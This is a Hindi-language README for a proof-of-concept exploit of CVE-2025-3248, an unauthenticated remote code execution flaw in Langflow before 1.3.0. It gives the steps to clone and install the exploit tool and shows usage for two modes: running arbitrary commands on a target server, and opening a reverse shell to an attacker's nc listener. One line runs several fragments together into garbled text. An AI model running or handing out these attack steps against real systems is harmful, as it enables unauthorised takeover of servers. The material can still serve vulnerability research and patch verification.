
CVE-2025-3248 के लिए PoC: Langflow < 1.3.0 में /api/v1/validate/code के माध्यम से बिना प्रमाणीकरण के RCE।
Langflow के कोड सत्यापन एंडपॉइंट में रिमोट कोड निष्पादन भेद्यता को प्रदर्शित करने वाला एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। यह भेद्यता Langflow के 1.3.0 से पहले के संस्करणों को प्रभावित करती है, जिससे बिना प्रमाणीकरण के हमलावर क्राफ्टेड HTTP अनुरोधों के माध्यम से मनमाना कोड निष्पादित कर सकते हैं।
/api/v1/validate/coderequestscoloramagit clone https://github.com/preemware/langflow-exploit
cd langflow-exploit
pip install requests colorama
यह एक्सप्लॉइट ऑपरेशन के दो तरीकों का समर्थन करता है:
लक्ष्य सिस्टम पर एक एकल कमांड निष्पादित करें:
python3 cve-2025-3248.py cmd <target_url> "<command>"
उदाहरण:
python3 cve-2025-3248.py cmd http://target:7860 "id"
एक इंटरैक्टिव रिवर्स शेल प्रारंभ करें:
nc -lvnp 4444
python3 cve-2025-3248.py shell <target_url> <your_ip> <your_port>
उदाहरण:
python3 cve-2025-3248.py shell http://target:7860 10.0.0.5 4444